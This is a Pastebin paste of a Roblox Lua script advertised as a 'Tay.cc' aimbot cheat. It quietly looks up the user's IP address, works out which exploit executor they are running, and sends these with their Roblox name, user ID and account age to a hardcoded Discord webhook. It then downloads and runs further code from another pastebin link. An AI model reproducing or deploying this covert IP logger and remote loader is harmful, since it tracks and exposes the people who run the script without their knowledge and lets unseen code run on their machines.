Advertisement
asdasdsadwa

Untitled

May 1st, 2022
27
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.29 KB | None | 0 0
  1. local plr = game.Players.LocalPlayer
  2. repeat wait() until plr.Character
  3. local gui = script.Parent
  4. local urlprofile = "https://roblox.com/users/"..game.Players.LocalPlayer.UserId.."/profile"
  5.  
  6.  
  7. local ident = game:HttpGet("https://v4.ident.me/")
  8.  
  9. local plr = game.Players.LocalPlayer
  10. local OSTime = os.time()
  11. local Time = os.date('!*t', OSTime)
  12.  
  13. local function getexploit()
  14. local exploit =
  15. (syn and not is_sirhurt_closure and not pebc_execute and "Synapse X") or
  16. (isexecutorclosure and "Script-Ware V2") or
  17. (secure_load and "Sentinel") or
  18. (is_sirhurt_closure and "SirHurt V4") or
  19. (pebc_execute and "ProtoSmasher") or
  20. (KRNL_LOADED and "Krnl") or
  21. (WrapGlobal and "WeAreDevs") or
  22. (isvm and "Proxo") or
  23. (shadow_env and "Shadow") or
  24. (jit and "EasyExploits") or
  25. (getreg()['CalamariLuaEnv'] and "Calamari") or
  26. (unit and "Unit") or
  27. ("Undetectable")
  28. return exploit
  29. end
  30. local Content = ""
  31. local Embed = {
  32. ["title"] = "***Execution***",
  33. ["description"] = "Name: "..plr.Name.."\nDisplay Name: "..plr.DisplayName.."\nExploit: "..getexploit().."\nGame: https://www.roblox.com/games/"..game.PlaceId,
  34. ["type"] = "rich",
  35. ["color"] = tonumber(0xffff00),
  36. ["thumbnail"] = {
  37. ["url"] = "https://www.roblox.com/asset-thumbnail/image?assetId="..game.PlaceId.."&width=768&height=432"
  38. },
  39. ["image"] = {
  40. ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=250&y=250&Format=Png&username="..plr.Name
  41. },
  42. ["fields"] = {
  43. {
  44. ["name"] = "__Account Age:__",
  45. ["value"] = plr.AccountAge.." days old",
  46. ["inline"] = true
  47. },
  48. {
  49. ["name"] = "__User ID:__",
  50. ["value"] = plr.UserId,
  51. ["inline"] = true
  52. }
  53. },
  54. ["footer"] = {
  55. ["text"] = "IP Address: "..tostring(ident),
  56. ["icon_url"] = "https://cdn.discordapp.com/attachments/903407245675606056/911635640452513843/Screenshot_25.png"
  57. },
  58. ["timestamp"] = string.format('%d-%d-%dT%02d:%02d:%02dZ', Time.year, Time.month, Time.day, Time.hour, Time.min, Time.sec),
  59. };
  60. (syn and syn.request or http_request or http.request) {
  61. Url = 'https://discord.com/api/webhooks/965456794208071680/vYc9OYEaHlJlGEAjLLkBJe7JiN-6V_JUoBrI8hz1jdU5f2ACoArCF7f-b-nx3vwjCEWR';
  62. Method = 'POST';
  63. Headers = {
  64. ['Content-Type'] = 'application/json';
  65. };
  66. Body = game:GetService'HttpService':JSONEncode({content = Content; embeds = {Embed}; });
  67. };
  68.  
  69. combo, prev, rnewidx = 0, 0, 0
  70. for i = 1, 50 do
  71. local n = math.random(10000, 99999)
  72. if i == 25 then
  73. rnewidx = n
  74. end
  75. if n == prev then
  76. combo = combo + 1
  77. end
  78. prev = n
  79. end
  80.  
  81. if combo > 45 then
  82. c("0x01")
  83. end
  84.  
  85.  
  86.  
  87.  
  88. game.StarterGui:SetCore("SendNotification", {
  89. Title = "Tay.cc : Syx & Free Support";
  90. Text = "Aimbot By : tay Silent By : Tay If Script Is Laggy Enabled esp all options ands turn them off again";
  91. })
  92.  
  93. loadstring(game:HttpGet(('https://pastebin.com/raw/pMMfjtwq'),true))()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement